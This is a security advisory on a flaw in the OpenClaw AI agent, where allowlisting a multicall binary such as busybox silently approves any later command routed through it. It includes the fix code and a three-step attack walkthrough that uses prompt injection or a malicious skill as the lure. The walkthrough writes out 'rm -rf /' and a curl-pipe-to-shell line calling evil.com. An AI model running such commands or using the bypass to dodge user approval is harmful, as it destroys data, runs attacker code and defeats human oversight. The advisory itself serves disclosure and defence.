GHSA-GWQP-86Q6-W47G: Execution Approval Bypass via Shell Multiplexers in OpenClaw

OpenClaw (formerly ClawdBot) implements a 'human-in-the-loop' security model where users must explicitly approve system commands generated by the AI agent. To balance security with usability, the system includes an 'allow-always' feature. When selected, this feature persists the executable path to an allowlist, preventing future prompts for that specific tool.

The vulnerability, identified as GHSA-GWQP-86Q6-W47G, is a Protection Mechanism Failure (CWE-693) within this persistence logic. The system blindly trusted the executable path of the running process without inspecting its arguments. This trust model collapses when the executable is a shell multiplexer—a single binary capable of acting as hundreds of different utilities (e.g., ls, cat, sh, rm) based on invocation arguments.

Because the authorization engine effectively flattened the identity of the command to the binary path (e.g., /bin/busybox), a user granting permission for a harmless operation (like busybox echo) would inadvertently authorize the execution of any command routed through that binary.

The root cause is a logic error in the identification of the 'process' being authorized. In standard Unix environments, most executables perform a single, well-defined function. However, multicall binaries like BusyBox and Toybox function as dispatch wrappers. They use the first argument (argv[0] or argv[1]) to determine which internal applet to execute.

Prior to version 2026.2.22-3, OpenClaw's authorization engine retrieved the absolute path of the executable and used it as the primary key for the allowlist. When a user approved a command like busybox sh -c 'date', the system stored /bin/busybox in the persistent configuration.

When a subsequent request arrived to execute busybox sh -c 'rm -rf /', the system performed a lookup for /bin/busybox. Finding a match in the allowlist, it permitted execution immediately, bypassing the user prompt. The system failed to recognize that for multiplexers, the security boundary lies not in the binary itself, but in the arguments passed to it.

The remediation involved introducing a recursive unwrapping mechanism to identify the true target of a command. The fix prevents the system from blindly allowlisting known multiplexers.

The following code from src/infra/exec-wrapper-resolution.ts demonstrates the new logic used to unwrap these invocations:

export function unwrapKnownShellMultiplexerInvocation(argv: string[]): ShellMultiplexerUnwrapResult {
  const token0 = argv[0]?.trim();
  const wrapper = normalizeExecutableToken(token0);
 
  // 1. Identify if the binary is a known multiplexer (BusyBox/Toybox)
  if (!SHELL_MULTIPLEXER_WRAPPER_CANONICAL.has(wrapper)) {
    return { kind: "not-wrapper" };
  }
 
  // 2. Parse the arguments to find the applet (inner command)
  let appletIndex = 1;
  if (argv[appletIndex]?.trim() === "--") { appletIndex += 1; }
  const applet = argv[appletIndex]?.trim();
 
  // 3. Fail safe: If we can't identify the applet, block the persistence
  if (!applet || !isShellWrapperExecutable(applet)) {
    return { kind: "blocked", wrapper };
  }
 
  // 4. Return the inner command for processing/allowlisting
  return { kind: "unwrapped", wrapper, argv: argv.slice(appletIndex) };
}

Instead of persisting the wrapper (token0), the system now recursively resolves the arguments until it finds a non-multiplexer executable. If a user authorizes busybox echo hello, the system now persists the path to the echo binary (or internal representation) rather than busybox.

An attacker can exploit this vulnerability through a three-stage process involving social engineering or prompt injection:

1. Luring: The attacker (via a malicious skill or prompt) triggers a benign command using a multiplexer. For example: busybox ping -c 1 8.8.8.8. The user sees a prompt asking to approve the network check.

2. Persistence: Trusting the operation, the user selects "Always allow" to avoid future prompts for connectivity checks. The system writes /bin/busybox to the security.allowlist.

3. Execution: The attacker subsequently issues a malicious command: busybox sh -c 'curl http://evil.com/payload | sh'. The authorization engine checks the binary path, matches /bin/busybox against the allowlist, and executes the payload silently.

This technique maps to MITRE ATT&CK T1548 (Abuse Elevation Control Mechanism) and T1204.002 (User Execution: Malicious File), relying on the user's trust to break the security boundary.

The impact of this vulnerability is critical for the integrity of the OpenClaw sandbox. By design, OpenClaw has access to the host system to perform tasks. The user approval prompt is the primary defense against rogue AI behavior or prompt injection attacks.

Consequences of Exploitation:

• Arbitrary Code Execution: Attackers can execute any system command with the privileges of the OpenClaw process.
• Silent Persistence: Once the multiplexer is allowlisted, the attacker can operate without alerting the user via UI prompts.
• Data Exfiltration: Sensitive files can be read and transmitted using standard tools provided by the multiplexer (e.g., cat, wget, nc).

The vulnerability specifically undermines the Defense in Depth strategy, rendering the "human-in-the-loop" control ineffective against sophisticated attacks leveraging standard system utilities.

Users must upgrade to openclaw version 2026.2.22-3 or later immediately. This version implements the unwrapKnownShellMultiplexerInvocation logic to correctly handle multi-call binaries.

Critical Post-Update Step: Updating the software prevents new insecure entries but does not automatically remove existing insecure entries. Administrators must audit and clear the existing allowlist:

1. Review the security.allowlist configuration.
2. Remove any entries pointing to shell multiplexers like /bin/busybox, /usr/bin/busybox, or /bin/toybox.
3. Restart the OpenClaw service.

For high-security environments, it is recommended to restrict the availability of shell multiplexers in the environment path where OpenClaw operates, or use containerization to limit the blast radius of executed commands.